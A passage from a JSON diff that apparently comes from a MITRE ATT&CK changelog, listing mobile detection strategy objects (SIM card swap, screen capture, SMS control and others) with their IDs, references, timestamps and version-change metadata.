+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.676000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0681",
+                            "external_id": "DET0681"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Protected User Data",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--99227275-37f5-400f-95ae-b5e17abfb0fd",
+                        "x-mitre-analytic--72604d06-ac1b-4d57-adb4-f303f2f82055"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.676000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--973a4da0-af9c-4d57-ab62-21fbc308f8b3",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.685000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0631",
+                            "external_id": "DET0631"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Proxy Through Victim",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--cb78ff0f-6f8a-41a8-a199-4660a0addec9"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.685000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--63b2446e-fa01-4440-bcd6-0f8505d630a6",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.679000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0622",
+                            "external_id": "DET0622"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Ptrace System Calls",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--50a9f608-68aa-4bf2-b24d-2a22f2a96db4",
+                        "x-mitre-analytic--76cb5e62-9291-411d-90bf-57642b63f8b8"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.679000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--c2155dfa-140f-4da9-bfe8-61481a9693c0",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.691000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0624",
+                            "external_id": "DET0624"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Remote Access Software",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--4d499685-2a71-4d66-8b44-fae780c3e998",
+                        "x-mitre-analytic--a180ad2e-e3fa-4cec-a1f0-8baf754d9543"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.691000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--62779c6a-e43b-4ea8-be38-f40191338089",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.679000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0702",
+                            "external_id": "DET0702"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Remote Device Management Services",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--40066e48-f70c-4fbb-a2cf-d7a385171edb",
+                        "x-mitre-analytic--6e3a93db-d2a6-43b7-9aa6-4dcf972f5e53"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.679000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--3b8a3713-0f0a-433c-82bd-13b2f9224206",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.675000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0691",
+                            "external_id": "DET0691"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Replication Through Removable Media",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--a69cefd7-02e8-4840-a26e-2ea0b6a95812",
+                        "x-mitre-analytic--a8133527-5402-49e0-a9f1-14ee4fb2dd3f"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.675000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--59e56dc2-725e-4f55-ab2c-154dbe42bc4d",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.678000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0658",
+                            "external_id": "DET0658"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of SIM Card Swap",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--085c9205-d55a-4e33-a5df-241e505be32f",
+                        "x-mitre-analytic--4ce71d01-ba3b-4ed2-a615-766daa0ff144"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.678000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--142329a9-ff29-4bc2-af36-7294afc5fee4",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.669000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0599",
+                            "external_id": "DET0599"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of SMS Control",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--a69604d3-2909-46bf-afd3-39b47ac5e5fd"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.669000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--aeb736c8-1c17-4fac-888e-122581ad6e0c",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.688000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0686",
+                            "external_id": "DET0686"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of SMS Messages",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--421fc6dc-1275-4eca-9950-150ad27d9bfd",
+                        "x-mitre-analytic--b1674dca-753f-45d9-b0de-4c68e459f046"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.688000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--c1b65a72-9f74-4849-9797-1a9c655d9a04",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.691000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0646",
+                            "external_id": "DET0646"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of SSL Pinning",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--05191336-6d06-41f7-babb-5d079e4168ae",
+                        "x-mitre-analytic--93a35555-f71e-4230-9f2a-529a539e8612"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.691000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--ea1efe01-98ef-4a49-a30d-72fde6750985",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.696000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0707",
+                            "external_id": "DET0707"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Scheduled Task/Job",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--07c399a0-e5ad-462d-99b9-f51ce8aa5061",
+                        "x-mitre-analytic--f10a7842-ddb2-488b-93ac-e53fa6476614"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.696000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--37c50db7-2081-4e24-91d0-787e091ea75a",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.674000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0668",
+                            "external_id": "DET0668"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Screen Capture",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--427fe5c7-1b91-4d71-ae2c-6840d128f0bd"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.674000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--9935655b-cd9b-485f-84ea-1b3b4b765413",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.685000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0680",
+                            "external_id": "DET0680"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Security Software Discovery",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--87d2ccc4-f82e-493d-9c6f-03303253aec2",
+                        "x-mitre-analytic--9c721bd4-75df-4381-bd70-29679aa78a4b"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.685000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--69ceab63-17ce-4e42-b247-055a180e6c2b",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.680000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0600",
+                            "external_id": "DET0600"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Software Discovery",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--992c6fa4-689c-4ce1-883f-f48a8b1c5ccc",
+                        "x-mitre-analytic--bff6f104-006e-48e5-ac3f-4633bb3abac5"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.680000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--34d06ebf-867e-4cd2-8e44-c849fcaab072",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.674000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0644",
+                            "external_id": "DET0644"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Software Packing",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--75a0da5c-9f2b-4e96-bb94-10c30f16a9a2",
+                        "x-mitre-analytic--d4dc642d-922b-4476-ad3f-ba23c43702f5"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.674000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--411f7c72-356c-4de6-bbf0-27a7952d3be5",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.676000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0656",
+                            "external_id": "DET0656"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Steal Application Access Token",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--9253e546-bc55-42c1-bf8c-b4337a1ea5b5",
+                        "x-mitre-analytic--8a463850-89e6-4de8-bd8d-20fd70dff959"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.676000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--545bde30-2b8c-47d3-bd34-fa188348b967",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.677000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0677",
+                            "external_id": "DET0677"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Steganography",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--cda313bc-214f-4bf8-9aa2-b3fb495379c3"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.677000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--d87dc800-38cb-4d82-b76e-3c501dbd9c0a",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.694000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0621",
+                            "external_id": "DET0621"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Stored Application Data",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--7f84f2b8-6ef3-4167-b059-a455d7c40a7d",
+                        "x-mitre-analytic--b755f519-cc0c-44a4-865f-fa9ead44590f"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
